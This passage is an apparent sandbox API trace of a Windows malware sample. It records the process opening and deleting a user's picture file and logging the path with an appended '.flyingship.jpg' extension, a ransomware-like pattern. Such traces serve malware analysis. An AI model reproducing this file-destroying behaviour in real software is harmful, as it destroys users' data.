dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.522] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.522] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0190.522] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0190.522] FreeLibrary (hLibModule=0x75c90000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0190.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0190.523] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.523] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0190.524] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\f2jfy_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0190.524] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.524] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0190.525] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.525] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.525] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.525] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.525] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0190.525] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.525] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.526] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.526] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.526] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", lpFilePart=0x0) returned 0x42 [0190.526] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51b8690, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x1a5beaa0, ftLastAccessTime.dwHighDateTime=0x1d5d9e4, ftLastWriteTime.dwLowDateTime=0x16c6eb80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa27d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="f2JFy_.jpg", cAlternateFileName="")) returned 0x90ae18 [0190.526] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\f2jfy_.jpg")) returned 1 [0190.528] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51b8690, ftCreationTime.dwHighDateTime=0x1d5dfc7, ftLastAccessTime.dwLowDateTime=0x1a5beaa0, ftLastAccessTime.dwHighDateTime=0x1d5d9e4, ftLastWriteTime.dwLowDateTime=0x16c6eb80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa27d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="f2JFy_.jpg", cAlternateFileName="")) returned 0 [0190.528] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0190.530] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.531] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.531] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.531] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.532] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.532] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.532] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.532] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.532] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.533] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.533] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0190.533] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.533] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.533] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0190.533] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2fb2, lpOverlapped=0x0) returned 1 [0190.533] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0190.533] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2fb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.533] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0190.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.flyingship.jpg\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0190.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0190.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.flyingship.jpg\r\n", cchWideChar=80, lpMultiByteStr=0x923a78, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.flyingship.jpg\r\n", lpUsedDefaultChar=0x0) returned 80 [0190.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0190.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0190.534] WriteFile (in: hFile=0x160, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x4f, lpOverlapped=0x0) returned 1 [0190.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0190.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.534] CloseHandle (hObject=0x160) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.536] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0190.536] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 